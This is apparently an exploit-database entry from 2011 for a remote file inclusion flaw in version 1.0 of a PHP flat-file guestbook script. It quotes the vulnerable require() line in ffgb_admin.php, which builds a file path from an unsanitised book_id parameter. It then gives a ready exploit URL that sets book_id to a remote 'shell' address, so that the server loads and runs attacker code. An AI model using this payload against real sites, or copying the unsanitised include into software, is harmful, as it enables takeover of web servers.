Rfi PHP Flat File Guestbook



EKU-ID: 815 CVE: OSVDB-ID:
Author: RiRes Walid Published: 2011-08-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Rfi PHP Flat File Guestbook
# Date: 11-08-2011
# Author: RiRes Walid
# Vendor or Software Link: http://www.advancebydesign.com
# Version: 1.0
# Google dork:
# Tested on: Xp sp2
------------------------------------------------------------
Remote File Inclusion
in ffgb_admin.php
line : 339
 
require('ffgb_comments/ffgb_'.$_GET['book_id'].'.php');
 
[o] Exploit
   
       http://localhost/[path]/ffgb_admin.php?book_id=http://shell?
 
-------------------------------------------------------------